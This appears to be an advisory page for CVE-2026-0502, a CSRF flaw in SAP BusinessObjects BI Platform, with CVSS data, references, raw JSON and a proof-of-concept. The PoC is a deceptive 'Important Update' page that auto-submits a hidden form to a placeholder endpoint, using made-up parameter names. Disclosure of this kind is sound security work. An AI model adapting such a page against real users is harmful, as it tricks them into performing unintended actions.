Security Vulnerability Report
CVE-2026-0502 CVSS 5.4 MEDIUM

CVE-2026-0502

Published: 2026-05-12 03:16:10
Last Modified: 2026-05-12 03:16:10

Description

Due to insufficient CSRF protection in SAP BusinessObjects Business Intelligence Platform, an authenticated user could be tricked by an attacker into sending unintended requests to the web server. This has low impact on the integrity and availability of the application. There is no impact on the confidentiality of the data.

CVSS Details

CVSS Score: 5.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

SAP BusinessObjects Business Intelligence Platform (for the specific affected versions, refer to SAP Security Patch Day and SAP Note 3667593)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- Proof of Concept (PoC) for CVE-2026-0502
     This HTML page demonstrates how an attacker could craft a malicious request.
     The victim must be authenticated to the SAP BusinessObjects platform. -->
<!DOCTYPE html>
<html>
<head>
  <title>Important Update</title>
  <style>
    body { font-family: Arial, sans-serif; text-align: center; padding: 50px; }
    .hidden { display: none; }
  </style>
</head>
<body>
  <h2>Please wait while we redirect you...</h2>
  <!-- The form targets a vulnerable endpoint on the SAP server -->
  <form id="csrf_form" action="http://target-sap-server:8080/platform/vulnerable_action" method="POST">
    <!-- These parameters represent the unintended requests an attacker wants to send.
         Actual parameter names would depend on the specific vulnerable endpoint. -->
    <input type="hidden" name="user_setting" value="malicious_value">
    <input type="hidden" name="confirm_action" value="true">
  </form>
  <script>
    // Automatically submit the form when the page loads
    document.addEventListener('DOMContentLoaded', function() {
      document.getElementById('csrf_form').submit();
    });
  </script>
</body>
</html>

References

https://me.sap.com/notes/3667593
https://url.sap/sapsecuritypatchday

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-0502", "sourceIdentifier": "[email protected]", "published": "2026-05-12T03:16:10.480", "lastModified": "2026-05-12T03:16:10.480", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Due to insufficient CSRF protection in SAP BusinessObjects Business Intelligence Platform ,an authenticated user could be tricked by an attacker to send unintended requests to the web server. This has low impact on integrity and availability of the application. There is no impact on confidentiality of the data."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://me.sap.com/notes/3667593", "source": "[email protected]"}, {"url": "https://url.sap/sapsecuritypatchday", "source": "[email protected]"}]}}